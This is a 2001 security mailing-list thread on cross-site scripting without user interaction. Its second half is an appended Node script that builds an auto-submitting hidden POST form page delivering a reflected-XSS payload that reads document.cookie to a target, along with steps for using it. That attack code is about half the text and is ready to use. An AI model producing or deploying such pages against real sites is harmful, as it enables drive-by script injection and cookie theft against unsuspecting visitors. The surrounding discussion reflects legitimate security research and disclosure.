From: Tony Welsh (lists at snowwinter.f2s.com)
Date: Tue Oct 23 2001 - 12:59:25 CDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CERT's explanation of Cross-Site woes...
http://www.cert.org/advisories/CA-2000-02.html
Or, if you want to see an auto-submitter using JScript in action, go here (I
wrote it as a proof of concept to show someone who did not believe it
was possible). It works scarily well (aside from the 405 error when it
tries to post to a static page), with no extra warnings etc.
http://www.snowwinter.f2s.com/evil.html
-----Original Message-----
From: Mark Curphey [mailto:mark at curphey.com]
Sent: Tuesday, October 23, 2001 7:31 AM
To: webappsec at securityfocus.com
Subject: Cross Site Scripting with No User Intervention
Does anyone have a really good explanation of how cross-site scripting could
work with no user intervention at all? I have seen lots of ways to pass
JavaScript, like URL and Unicode encoded (and OWASP are writing them up), but I
haven't seen a good explanation of how it can be used on a totally innocent
user... all the exploits I have *seen* have involved first tricking the
target into clicking a hyperlink...
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
Comment: http://www.snowwinter.f2s.com/
iQA/AwUBO9Wv+K0tBy4nR959EQIp/QCZAdLKxbC3+6f3AzKC3VLHfKpt+6EAnRdd
GHzBEUZndi+D2Ccwxi9xJHOl
=q3ST
-----END PGP SIGNATURE-----
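The "auto-submitter" Tony describes is a page carrying a hidden POST form that submits itself from the onload handler, so a visitor who merely loads the page sends the reflected-XSS payload to the target without clicking anything. The following is an added example, not his evil.html (which is not reproduced on this page) and not part of the original thread: a small Node script that generates such a page and checks that the payload survives the round trip. The target URL, the field name `q` and the payload are assumed placeholders.

```javascript
// Added example: generator for an auto-submitting POST form page of the kind
// described above. Not the original evil.html; target, field and payload are
// constructed placeholders.

const TARGET = "http://vulnerable.example/search";        // assumed target that reflects "q"
const PAYLOAD = "<script>alert(document.cookie)</script>"; // classic reflected-XSS probe

// Escape a value for use inside a double-quoted HTML attribute. Without this the
// payload's angle brackets and quotes would break the attacker's own page before
// it reaches the target; the browser decodes the entities back to the raw
// payload when it serialises the form.
function escapeAttr(s) {
  return s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
          .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Inverse of escapeAttr: the value a browser actually submits for the attribute.
function decodeAttr(s) {
  return s.replace(/&quot;/g, '"').replace(/&lt;/g, "<")
          .replace(/&gt;/g, ">").replace(/&amp;/g, "&");
}

// Build the page. The method must be POST for a target that accepts it; a
// static page answers 405 Method Not Allowed, which is the error noted above.
function buildAutoSubmitter(action, fields, method = "POST") {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`)
    .join("\n    ");
  return `<!DOCTYPE html>
<html><body>
  <form id="f" method="${method}" action="${escapeAttr(action)}">
    ${inputs}
  </form>
  <script>window.onload = function () { document.getElementById("f").submit(); };</script>
</body></html>`;
}

// Reconstruct the field values a browser would submit from a generated page,
// i.e. decode the hidden inputs; used to confirm the payload arrives intact.
function submittedFields(html) {
  const out = {};
  const re = /<input type="hidden" name="([^"]*)" value="([^"]*)">/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    out[decodeAttr(m[1])] = decodeAttr(m[2]);
  }
  return out;
}

// Stand-alone run: emit the page and the request fields it would produce.
const page = buildAutoSubmitter(TARGET, { q: PAYLOAD });
console.log(page);
console.log(submittedFields(page));
```

Save the generated page and open it in a browser: the form posts to the target as soon as the page loads, with no prompt. If the target reflects `q` unescaped into its response, the script in the payload runs in the target's origin; the victim's only action was loading the attacker's page (or a frame containing it).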